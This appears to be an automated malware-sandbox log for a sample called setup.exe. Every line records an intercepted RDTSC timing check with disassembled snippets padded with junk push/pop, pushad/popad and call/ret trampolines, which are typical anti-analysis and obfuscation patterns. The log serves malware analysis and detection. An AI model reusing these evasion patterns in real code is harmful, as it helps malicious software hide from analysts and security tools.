Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9818FB second address: 981902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9839EB second address: 9839F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9839F1 second address: 983A21 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBA24820DA5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA24820DA4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 983A21 second address: 983A26 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 98E5CF second address: 98E5E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9905FA second address: 9905FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 99822D second address: 998254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA24820DA6h 0x00000009 jmp 00007FBA24820D9Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 997DAF second address: 997DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 99D700 second address: 99D704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 99D704 second address: 99D747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FBA2516CD54h 0x0000000d push ebx 0x0000000e jnp 00007FBA2516CD46h 0x00000014 pop ebx 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007FBA2516CD52h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 98A77C second address: 98A79B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA24820D9Ch 0x00000008 jc 00007FBA24820D96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FBA24820D9Ch 0x00000019 jnc 00007FBA24820D96h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 98B744 second address: 98B74A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 98B7F3 second address: 98B810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA24820DA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 98C762 second address: 98C766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 98E886 second address: 98E88A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 99D860 second address: 99D865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 99D865 second address: 99D8AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA24820DA3h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007FBA24820DA0h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBA24820DA7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 99D8AF second address: 7CEA92 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBA2516CD48h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e add cx, A55Fh 0x00000013 popad 0x00000014 push dword ptr [ebp+122D1685h] 0x0000001a jns 00007FBA2516CD49h 0x00000020 pushad 0x00000021 cld 0x00000022 popad 0x00000023 call dword ptr [ebp+122D389Ah] 0x00000029 pushad 0x0000002a jns 00007FBA2516CD5Dh 0x00000030 pushad 0x00000031 jmp 00007FBA2516CD55h 0x00000036 popad 0x00000037 xor eax, eax 0x00000039 add dword ptr [ebp+122D1A4Ch], ecx 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 pushad 0x00000044 mov dword ptr [ebp+122D1EFAh], edi 0x0000004a popad 0x0000004b mov dword ptr [ebp+122D29CCh], eax 0x00000051 js 00007FBA2516CD52h 0x00000057 sub dword ptr [ebp+122D1F2Ch], ecx 0x0000005d mov esi, 0000003Ch 0x00000062 cld 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 mov dword ptr [ebp+122D1A4Ch], esi 0x0000006d lodsw 0x0000006f jmp 00007FBA2516CD58h 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 clc 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d stc 0x0000007e push eax 0x0000007f push esi 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 popad 0x00000084 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 98F66B second address: 98F685 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jns 00007FBA24820D9Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 99080F second address: 990834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA2516CD4Ch 0x00000009 popad 0x0000000a jg 00007FBA2516CD48h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007FBA2516CD46h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 990834 second address: 99083E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A3176 second address: 9A3187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBA2516CD46h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A3187 second address: 9A318B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A29F7 second address: 9A29FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A29FC second address: 9A2A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A2A02 second address: 9A2A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A2A08 second address: 9A2A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A2B62 second address: 9A2B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBA2516CD51h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A2B86 second address: 9A2B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FBA24820D96h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A2B9A second address: 9A2BAE instructions: 0x00000000 rdtsc 0x00000002 je 00007FBA2516CD46h 0x00000008 js 00007FBA2516CD46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A2BAE second address: 9A2BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A2BB2 second address: 9A2BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A2BB8 second address: 9A2BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FBA24820D96h 0x00000009 jbe 00007FBA24820D96h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A3009 second address: 9A300D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A300D second address: 9A3016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A3016 second address: 9A301B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 933EB2 second address: 933ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FBA24820DA5h 0x0000000b jl 00007FBA24820D96h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 933ED3 second address: 933EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 933EDD second address: 933EE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97B28F second address: 97B296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97B296 second address: 95BEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FBA24820D98h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D278Ch], ebx 0x00000028 call dword ptr [ebp+122D3874h] 0x0000002e push ecx 0x0000002f jmp 00007FBA24820D9Ah 0x00000034 pop ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FBA24820D9Bh 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f pop eax 0x00000040 jmp 00007FBA24820DA8h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97B7FA second address: 97B7FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97B7FE second address: 7CEA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 or dword ptr [ebp+1246E724h], eax 0x0000000e push dword ptr [ebp+122D1685h] 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FBA24820D98h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D24A2h], ecx 0x00000034 call dword ptr [ebp+122D389Ah] 0x0000003a pushad 0x0000003b jns 00007FBA24820DADh 0x00000041 xor eax, eax 0x00000043 add dword ptr [ebp+122D1A4Ch], ecx 0x00000049 mov edx, dword ptr [esp+28h] 0x0000004d pushad 0x0000004e mov dword ptr [ebp+122D1EFAh], edi 0x00000054 popad 0x00000055 mov dword ptr [ebp+122D29CCh], eax 0x0000005b js 00007FBA24820DA2h 0x00000061 sub dword ptr [ebp+122D1F2Ch], ecx 0x00000067 mov esi, 0000003Ch 0x0000006c cld 0x0000006d add esi, dword ptr [esp+24h] 0x00000071 mov dword ptr [ebp+122D1A4Ch], esi 0x00000077 lodsw 0x00000079 jmp 00007FBA24820DA8h 0x0000007e add eax, dword ptr [esp+24h] 0x00000082 clc 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 stc 0x00000088 push eax 0x00000089 push esi 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d popad 0x0000008e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97BB0A second address: 97BB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], esi 0x00000009 sbb edx, 0589A7FFh 0x0000000f nop 0x00000010 je 00007FBA2516CD54h 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007FBA2516CD46h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97BDEC second address: 97BE5D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FBA24820D98h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FBA24820D98h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 pushad 0x00000045 mov cl, B4h 0x00000047 mov edi, ebx 0x00000049 popad 0x0000004a nop 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jng 00007FBA24820D96h 0x00000054 jmp 00007FBA24820D9Dh 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97C556 second address: 97C55B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97C5F5 second address: 97C60E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FBA24820D98h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007FBA24820D96h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97C60E second address: 97C618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97C618 second address: 97C61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97C61C second address: 97C69A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FBA2516CD48h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 pushad 0x00000027 jmp 00007FBA2516CD4Ch 0x0000002c mov edi, dword ptr [ebp+122D1A3Eh] 0x00000032 popad 0x00000033 mov edi, dword ptr [ebp+122D1994h] 0x00000039 pushad 0x0000003a mov eax, dword ptr [ebp+122D23CDh] 0x00000040 mov si, di 0x00000043 popad 0x00000044 lea eax, dword ptr [ebp+1247FFF4h] 0x0000004a jmp 00007FBA2516CD50h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FBA2516CD52h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97C69A second address: 97C6E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FBA24820D9Eh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+124492F7h], eax 0x00000014 lea eax, dword ptr [ebp+1247FFB0h] 0x0000001a mov dx, 4AC5h 0x0000001e nop 0x0000001f jmp 00007FBA24820DA5h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jnp 00007FBA24820D98h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97C6E2 second address: 97C6EC instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA2516CD4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A7657 second address: 9A766F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBA24820DA4h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A7A93 second address: 9A7A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A7A99 second address: 9A7AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A7AA7 second address: 9A7AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A7AAD second address: 9A7AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A7AB3 second address: 9A7AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A7AB7 second address: 9A7ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA24820DA0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007FBA24820D9Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A7D94 second address: 9A7D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A7D9A second address: 9A7DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FBA24820D9Eh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9A7DB3 second address: 9A7DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 pushad 0x00000008 jc 00007FBA2516CD46h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9AE155 second address: 9AE159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9AE159 second address: 9AE1A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBA2516CD57h 0x0000000b jmp 00007FBA2516CD4Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBA2516CD57h 0x00000017 jmp 00007FBA2516CD4Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9AE1A8 second address: 9AE1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9ACE36 second address: 9ACE46 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBA2516CD46h 0x00000008 jo 00007FBA2516CD46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9ACE46 second address: 9ACE85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FBA24820D96h 0x00000012 jmp 00007FBA24820DA9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9ACFF5 second address: 9AD045 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FBA2516CD52h 0x00000008 pop esi 0x00000009 pushad 0x0000000a je 00007FBA2516CD46h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jbe 00007FBA2516CD46h 0x00000018 jmp 00007FBA2516CD4Eh 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push ecx 0x00000022 jmp 00007FBA2516CD52h 0x00000027 push edx 0x00000028 pop edx 0x00000029 pop ecx 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9AD199 second address: 9AD1AA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBA24820D96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9AD353 second address: 9AD37A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD59h 0x00000009 jmp 00007FBA2516CD4Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9AD5E0 second address: 9AD5E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9AD73E second address: 9AD76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA2516CD54h 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBA2516CD4Ch 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9AC87D second address: 9AC885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9AC885 second address: 9AC8AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FBA2516CD46h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9AC8AC second address: 9AC8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B3E4C second address: 9B3E74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FBA2516CD46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FBA2516CD59h 0x00000015 jmp 00007FBA2516CD53h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9B3E74 second address: 9B3E79 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 93E123 second address: 93E12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
